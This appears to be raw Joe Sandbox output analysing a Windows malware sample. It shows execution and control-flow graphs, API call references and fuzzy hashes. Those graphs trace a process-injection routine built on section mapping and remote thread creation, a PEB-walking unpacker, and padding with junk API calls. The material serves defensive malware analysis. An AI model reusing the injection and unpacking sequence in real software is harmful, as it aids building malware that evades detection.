                                                                                                                              execution_graph 3671 402e40 3674 402e37 3671->3674 3673 402edf 3674->3673 3675 4018e6 3674->3675 3676 4018f5 3675->3676 3677 40192e Sleep 3676->3677 3678 401949 3677->3678 3680 40195a 3678->3680 3681 401514 3678->3681 3680->3673 3682 401524 3681->3682 3683 4015c4 NtDuplicateObject 3682->3683 3689 4016e0 3682->3689 3684 4015e1 NtCreateSection 3683->3684 3683->3689 3685 401661 NtCreateSection 3684->3685 3686 401607 NtMapViewOfSection 3684->3686 3687 40168d 3685->3687 3685->3689 3686->3685 3688 40162a NtMapViewOfSection 3686->3688 3687->3689 3690 401697 NtMapViewOfSection 3687->3690 3688->3685 3691 401648 3688->3691 3689->3680 3690->3689 3692 4016be NtMapViewOfSection 3690->3692 3691->3685 3692->3689 3810 40b000 3811 40b004 3810->3811 3814 40b03c 3811->3814 3817 40b784 RtlLeaveCriticalSection 3814->3817 3816 40b033 3817->3816 3693 41a3c0 3696 419fc0 3693->3696 3695 41a3c5 3698 419fe0 3696->3698 3697 419fe9 GetVolumeInformationA 3697->3698 3698->3697 3699 41a081 3698->3699 3700 41a1a9 3699->3700 3701 41a09a InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 3699->3701 3702 41a1b5 SetCommState 3700->3702 3708 41a1ce 3700->3708 3703 41a0de 7 API calls 3701->3703 3702->3700 3704 41a187 3703->3704 3705 41a17b ObjectPrivilegeAuditAlarmA 3703->3705 3706 41a190 WaitForSingleObject 3704->3706 3707 41a198 3704->3707 3705->3704 3706->3707 3707->3700 3709 41a296 3708->3709 3710 41a1db 9 API calls 3708->3710 3723 419c90 LocalAlloc 3709->3723 3721 41a269 3710->3721 3714 41a29b LoadLibraryA 3724 419cc0 GetModuleHandleW GetProcAddress VirtualProtect 3714->3724 3715 41a2ed 3725 419f20 3715->3725 3717 41a309 MoveFileA 3718 41a2f2 3717->3718 3718->3717 3719 41a333 InterlockedCompareExchange 3718->3719 3722 41a34d 3718->3722 3719->3718 3721->3709 3722->3695 3723->3714 3724->3715 3726 419f49 QueryDosDeviceW 3725->3726 3727 419f5a 3725->3727 3726->3727 3736 419e60 3727->3736 3730 419f75 3739 419ea0 3730->3739 3731 419f6d FreeEnvironmentStringsW 3731->3730 3734 419fa3 3734->3718 3735 419f8c HeapDestroy GetNumaProcessorNode 3735->3734 3737 419e71 FatalAppExitW GetModuleHandleA 3736->3737 3738 419e83 3736->3738 3737->3738 3738->3730 3738->3731 3740 419ebc 3739->3740 3741 419eae BuildCommDCBW 3739->3741 3742 419ec4 FreeEnvironmentStringsA 3740->3742 3743 419ecc 3740->3743 3741->3743 3742->3743 3744 419efd 3743->3744 3746 419e90 3743->3746 3744->3734 3744->3735 3749 419e10 3746->3749 3750 419e3b 3749->3750 3751 419e2c SetPriorityClass 3749->3751 3750->3743 3751->3750 3950 401542 3951 40153b 3950->3951 3952 4015c4 NtDuplicateObject 3951->3952 3956 4016e0 3951->3956 3953 4015e1 NtCreateSection 3952->3953 3952->3956 3954 401661 NtCreateSection 3953->3954 3955 401607 NtMapViewOfSection 3953->3955 3954->3956 3957 40168d 3954->3957 3955->3954 3958 40162a NtMapViewOfSection 3955->3958 3957->3956 3959 401697 NtMapViewOfSection 3957->3959 3958->3954 3960 401648 3958->3960 3959->3956 3961 4016be NtMapViewOfSection 3959->3961 3960->3954 3961->3956 3995 40b308 3996 40b374 GetConsoleOutputCP WideCharToMultiByte 3995->3996 3997 40b325 3995->3997 3999 40b39b WriteConsoleA 3996->3999 4002 40b33d 3996->4002 3998 40b333 3997->3998 4006 40b84a CreateFileA 3997->4006 4001 40b344 WriteConsoleW 3998->4001 3998->4002 3999->4002 4001->4002 4003 40b35a 4001->4003 4003->4002 4004 40b363 GetLastError 4003->4004 4004->4002 4005 40b36e 4004->4005 4005->3996 4006->3998 3818 40b20a 3819 40b20f 3818->3819 3821 40b21d 3819->3821 3822 40b7ab 3819->3822 3823 40b7b7 3822->3823 3825 40b801 RtlDeleteCriticalSection 3823->3825 3826 40b82c __fcloseall 3823->3826 3827 40b90d 3823->3827 3825->3823 3826->3821 3828 40b919 3827->3828 3829 40b92d 3828->3829 3835 40b22a 3828->3835 3829->3823 3836 40b23c 3835->3836 3837 40b25e RtlEnterCriticalSection 3835->3837 3836->3837 3838 40b244 3836->3838 3837->3838 3839 40b896 3838->3839 3840 40b8c6 __fileno __freebuf 3839->3840 3842 40b8aa 3839->3842 3840->3842 3846 40ba25 3840->3846 3843 40b981 3842->3843 3869 40b29d 3843->3869 3845 40b987 3845->3829 3847 40ba31 3846->3847 3848 40b6e4 ___lock_fhandle RtlEnterCriticalSection 3847->3848 3850 40ba39 3847->3850 3849 40baa9 3848->3849 3852 40babe 3849->3852 3854 40b989 3849->3854 3850->3842 3861 40bae8 3852->3861 3859 40b999 __lseeki64_nolock 3854->3859 3855 40b9ef 3864 40b5e7 3855->3864 3858 40b9d9 CloseHandle 3858->3855 3860 40b9e5 GetLastError 3858->3860 3859->3855 3859->3858 3860->3855 3868 40b784 RtlLeaveCriticalSection 3861->3868 3863 40baf0 3863->3850 3865 40b649 3864->3865 3866 40b5f8 3864->3866 3865->3852 3866->3865 3867 40b643 SetStdHandle 3866->3867 3867->3865 3868->3863 3870 40b2cd RtlLeaveCriticalSection 3869->3870 3871 40b2ae 3869->3871 3870->3845 3871->3870 3872 40b2b5 3871->3872 3872->3845 4026 402dd0 4027 402ddc 4026->4027 4028 4018e6 8 API calls 4027->4028 4029 402edf 4027->4029 4028->4029 3873 40b011 3874 40b016 3873->3874 3875 40b03c RtlLeaveCriticalSection 3874->3875 3876 40b033 3875->3876 4013 401915 4014 4018c6 4013->4014 4015 40191a 4013->4015 4016 40192e Sleep 4015->4016 4017 401949 4016->4017 4018 401514 7 API calls 4017->4018 4019 40195a 4017->4019 4018->4019 3752 6b003c 3753 6b0049 3752->3753 3765 6b0e0f SetErrorMode SetErrorMode 3753->3765 3758 6b0265 3759 6b02ce VirtualProtect 3758->3759 3761 6b030b 3759->3761 3760 6b0439 VirtualFree 3764 6b04be LoadLibraryA 3760->3764 3761->3760 3763 6b08c7 3764->3763 3766 6b0223 3765->3766 3767 6b0d90 3766->3767 3768 6b0dad 3767->3768 3769 6b0dbb GetPEB 3768->3769 3770 6b0238 VirtualAlloc 3768->3770 3769->3770 3770->3758 3786 402f97 3787 4030ee 3786->3787 3788 402fc1 3786->3788 3788->3787 3789 40307c RtlCreateUserThread NtTerminateProcess 3788->3789 3789->3787 3915 419ed6 3916 419ee0 3915->3916 3917 419e90 SetPriorityClass 3916->3917 3918 419efd 3916->3918 3917->3916 3919 40b2d9 3920 40b2e9 3919->3920 3921 40b2fc RtlLeaveCriticalSection 3919->3921 3986 40b562 3987 40b580 __lseeki64_nolock 3986->3987 3988 40b599 SetFilePointer 3987->3988 3990 40b588 3987->3990 3989 40b5b1 GetLastError 3988->3989 3988->3990 3989->3990 3922 40b4e4 3925 40b3cd 3922->3925 3926 40b3e0 3925->3926 3930 40b3e9 3925->3930 3927 40b440 3926->3927 3928 40b4bd MultiByteToWideChar 3926->3928 3926->3930 3929 40b453 MultiByteToWideChar 3927->3929 3927->3930 3928->3930 3929->3930 3771 911036 3772 911045 3771->3772 3775 9117d6 3772->3775 3776 9117f1 3775->3776 3777 9117fa CreateToolhelp32Snapshot 3776->3777 3778 911816 Module32First 3776->3778 3777->3776 3777->3778 3779 911825 3778->3779 3781 91104e 3778->3781 3782 911495 3779->3782 3783 9114c0 3782->3783 3784 9114d1 VirtualAlloc 3783->3784 3785 911509 3783->3785 3784->3785 3785->3785 3881 6b0001 3882 6b0005 3881->3882 3887 6b092b GetPEB 3882->3887 3884 6b0030 3889 6b003c 3884->3889 3888 6b0972 3887->3888 3888->3884 3890 6b0049 3889->3890 3891 6b0e0f 2 API calls 3890->3891 3892 6b0223 3891->3892 3893 6b0d90 GetPEB 3892->3893 3894 6b0238 VirtualAlloc 3893->3894 3895 6b0265 3894->3895 3896 6b02ce VirtualProtect 3895->3896 3898 6b030b 3896->3898 3897 6b0439 VirtualFree 3901 6b04be LoadLibraryA 3897->3901 3898->3897 3900 6b08c7 3901->3900 3790 40b26b 3791 40b278 3790->3791 3792 40b28e RtlEnterCriticalSection 3790->3792 3906 6b0005 3907 6b092b GetPEB 3906->3907 3908 6b0030 3907->3908 3909 6b003c 7 API calls 3908->3909 3910 6b0038 3909->3910 3931 4018f1 3932 4018f6 3931->3932 3933 40192e Sleep 3932->3933 3934 401949 3933->3934 3935 401514 7 API calls 3934->3935 3936 40195a 3934->3936 3935->3936 3793 40b078 3794 40b084 3793->3794 3797 40b08c 3794->3797 3802 40b6e4 3794->3802 3796 40b0ed __lseeki64_nolock 3798 40b102 FlushFileBuffers 3796->3798 3799 40b119 3796->3799 3798->3799 3800 40b10e GetLastError 3798->3800 3806 40b14f 3799->3806 3800->3799 3805 40b6f0 ___lock_fhandle 3802->3805 3803 40b750 RtlEnterCriticalSection 3804 40b76d 3803->3804 3804->3796 3805->3803 3805->3804 3809 40b784 RtlLeaveCriticalSection 3806->3809 3808 40b157 3808->3797 3809->3808 3991 402d7b 3994 402d38 3991->3994 3992 402dc7 3993 4018e6 8 API calls 3993->3992 3994->3991 3994->3992 3994->3993 3937 4014fe 3938 401506 3937->3938 3939 401531 3937->3939 3940 4015c4 NtDuplicateObject 3939->3940 3946 4016e0 3939->3946 3941 4015e1 NtCreateSection 3940->3941 3940->3946 3942 401661 NtCreateSection 3941->3942 3943 401607 NtMapViewOfSection 3941->3943 3944 40168d 3942->3944 3942->3946 3943->3942 3945 40162a NtMapViewOfSection 3943->3945 3944->3946 3947 401697 NtMapViewOfSection 3944->3947 3945->3942 3948 401648 3945->3948 3947->3946 3949 4016be NtMapViewOfSection 3947->3949 3948->3942 3949->3946

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 419fc0-419fde 1 419fe0-419fe7 0->1 2 41a015-41a01b 1->2 3 419fe9-41a00f GetVolumeInformationA 1->3 4 41a01d-41a029 2->4 5 41a02f-41a039 2->5 3->2 4->5 6 41a074-41a07b 5->6 7 41a03b-41a06a 5->7 6->1 8 41a081-41a094 6->8 7->6 10 41a1a9-41a1af 8->10 11 41a09a-41a179 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileW CreatePipe GetEnvironmentStrings WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 8->11 12 41a1b5-41a1c3 SetCommState 10->12 14 41a187-41a18e 11->14 15 41a17b-41a181 ObjectPrivilegeAuditAlarmA 11->15 19 41a1c5-41a1cc 12->19 20 41a1ce-41a1d5 12->20 17 41a190-41a192 WaitForSingleObject 14->17 18 41a198-41a1a6 14->18 15->14 17->18 18->10 19->12 19->20 21 41a296-41a2a5 call 419c90 20->21 22 41a1db-41a290 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameA GetCommTimeouts 20->22 27 41a2a7-41a2b8 21->27 28 41a2dd-41a2e8 LoadLibraryA call 419cc0 21->28 22->21 30 41a2c0-41a2d0 27->30 35 41a2ed-41a2fe call 419f20 28->35 33 41a2d2 30->33 34 41a2d8-41a2db 30->34 33->34 34->28 34->30 40 41a300-41a307 35->40 41 41a309-41a317 MoveFileA 40->41 42 41a31d-41a323 40->42 41->42 43 41a325 call 419cb0 42->43 44 41a32a-41a331 42->44 43->44 47 41a333-41a33e InterlockedCompareExchange 44->47 48 41a344-41a34b 44->48 47->48 48->40 50 41a34d-41a35d 48->50 52 41a360-41a370 50->52 54 41a372 52->54 55 41a379-41a37c 52->55 54->55 55->52 57 41a37e-41a389 55->57 58 41a390-41a395 57->58 59 41a397-41a39d 58->59 60 41a39f-41a3a5 58->60 59->60 61 41a3a7-41a3b4 59->61 60->58 60->61
                                                                                                                              APIs
                                                                                                                              • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0041A00F
                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041A0A3
                                                                                                                              • GetFocus.USER32 ref: 0041A0A9
                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A0B4
                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 0041A0BB
                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A0C3
                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0041A0EA
                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0041A0F3
                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 0041A109
                                                                                                                              • GetEnvironmentStrings.KERNEL32 ref: 0041A10F
                                                                                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041A154
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041A163
                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 0041A16C
                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A181
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041A192
                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 0041A1B9
                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0041A1EA
                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041A1FE
                                                                                                                              • CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 0041A20F
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0041A216
                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 0041A21C
                                                                                                                              • GetBinaryType.KERNEL32(0041C400,?), ref: 0041A22E
                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A241
                                                                                                                              • GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A254
                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A25C
                                                                                                                              • LoadLibraryA.KERNELBASE(0041C424), ref: 0041A2E2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
                                                                                                                              • String ID: k`$}$
                                                                                                                              • API String ID: 4249349521-956986773
                                                                                                                              • Opcode ID: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
                                                                                                                              • Instruction ID: 4f0dc8ef0138a425de16278279ab74f02fd967f86d49b53b2b7e7158032d42a8
                                                                                                                              • Opcode Fuzzy Hash: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
                                                                                                                              • Instruction Fuzzy Hash: ABA19F71802524ABD725EB61DC48FDF7B78EF49311F00816AF619A2161DB381A85CFEE

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 148 401514-401533 150 401524-40152f 148->150 151 401536-40156e call 401193 148->151 150->151 160 401570 151->160 161 401573-401578 151->161 160->161 163 401898-4018a0 161->163 164 40157e-40158f 161->164 163->161 167 401595-4015be 164->167 168 401896-4018a5 164->168 167->168 177 4015c4-4015db NtDuplicateObject 167->177 171 4018b4 168->171 172 4018ab-4018b0 168->172 171->172 173 4018b7 171->173 172->173 174 4018c5 173->174 175 4018bc-4018e3 call 401193 173->175 174->175 177->168 179 4015e1-401605 NtCreateSection 177->179 182 401661-401687 NtCreateSection 179->182 183 401607-401628 NtMapViewOfSection 179->183 182->168 185 40168d-401691 182->185 183->182 186 40162a-401646 NtMapViewOfSection 183->186 185->168 188 401697-4016b8 NtMapViewOfSection 185->188 186->182 189 401648-40165e 186->189 188->168 191 4016be-4016da NtMapViewOfSection 188->191 189->182 191->168 193 4016e0 call 4016e5 191->193
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 195 4014fe-401503 196 401531-40156e call 401193 195->196 197 401506-401511 195->197 207 401570 196->207 208 401573-401578 196->208 207->208 210 401898-4018a0 208->210 211 40157e-40158f 208->211 210->208 214 401595-4015be 211->214 215 401896-4018a5 211->215 214->215 224 4015c4-4015db NtDuplicateObject 214->224 218 4018b4 215->218 219 4018ab-4018b0 215->219 218->219 220 4018b7 218->220 219->220 221 4018c5 220->221 222 4018bc-4018e3 call 401193 220->222 221->222 224->215 226 4015e1-401605 NtCreateSection 224->226 229 401661-401687 NtCreateSection 226->229 230 401607-401628 NtMapViewOfSection 226->230 229->215 232 40168d-401691 229->232 230->229 233 40162a-401646 NtMapViewOfSection 230->233 232->215 235 401697-4016b8 NtMapViewOfSection 232->235 233->229 236 401648-40165e 233->236 235->215 238 4016be-4016da NtMapViewOfSection 235->238 236->229 238->215 240 4016e0 call 4016e5 238->240
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1652636561-0
                                                                                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 242 401542-40156e call 401193 251 401570 242->251 252 401573-401578 242->252 251->252 254 401898-4018a0 252->254 255 40157e-40158f 252->255 254->252 258 401595-4015be 255->258 259 401896-4018a5 255->259 258->259 268 4015c4-4015db NtDuplicateObject 258->268 262 4018b4 259->262 263 4018ab-4018b0 259->263 262->263 264 4018b7 262->264 263->264 265 4018c5 264->265 266 4018bc-4018e3 call 401193 264->266 265->266 268->259 270 4015e1-401605 NtCreateSection 268->270 273 401661-401687 NtCreateSection 270->273 274 401607-401628 NtMapViewOfSection 270->274 273->259 276 40168d-401691 273->276 274->273 277 40162a-401646 NtMapViewOfSection 274->277 276->259 279 401697-4016b8 NtMapViewOfSection 276->279 277->273 280 401648-40165e 277->280 279->259 282 4016be-4016da NtMapViewOfSection 279->282 280->273 282->259 284 4016e0 call 4016e5 282->284
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 286 401549-40156e call 401193 290 401570 286->290 291 401573-401578 286->291 290->291 293 401898-4018a0 291->293 294 40157e-40158f 291->294 293->291 297 401595-4015be 294->297 298 401896-4018a5 294->298 297->298 307 4015c4-4015db NtDuplicateObject 297->307 301 4018b4 298->301 302 4018ab-4018b0 298->302 301->302 303 4018b7 301->303 302->303 304 4018c5 303->304 305 4018bc-4018e3 call 401193 303->305 304->305 307->298 309 4015e1-401605 NtCreateSection 307->309 312 401661-401687 NtCreateSection 309->312 313 401607-401628 NtMapViewOfSection 309->313 312->298 315 40168d-401691 312->315 313->312 316 40162a-401646 NtMapViewOfSection 313->316 315->298 318 401697-4016b8 NtMapViewOfSection 315->318 316->312 319 401648-40165e 316->319 318->298 321 4016be-4016da NtMapViewOfSection 318->321 319->312 321->298 323 4016e0 call 4016e5 321->323
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 325 401557 326 40155b-40156e call 401193 325->326 327 40154f-401554 325->327 330 401570 326->330 331 401573-401578 326->331 327->326 330->331 333 401898-4018a0 331->333 334 40157e-40158f 331->334 333->331 337 401595-4015be 334->337 338 401896-4018a5 334->338 337->338 347 4015c4-4015db NtDuplicateObject 337->347 341 4018b4 338->341 342 4018ab-4018b0 338->342 341->342 343 4018b7 341->343 342->343 344 4018c5 343->344 345 4018bc-4018e3 call 401193 343->345 344->345 347->338 349 4015e1-401605 NtCreateSection 347->349 352 401661-401687 NtCreateSection 349->352 353 401607-401628 NtMapViewOfSection 349->353 352->338 355 40168d-401691 352->355 353->352 356 40162a-401646 NtMapViewOfSection 353->356 355->338 358 401697-4016b8 NtMapViewOfSection 355->358 356->352 359 401648-40165e 356->359 358->338 361 4016be-4016da NtMapViewOfSection 358->361 359->352 361->338 363 4016e0 call 4016e5 361->363
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
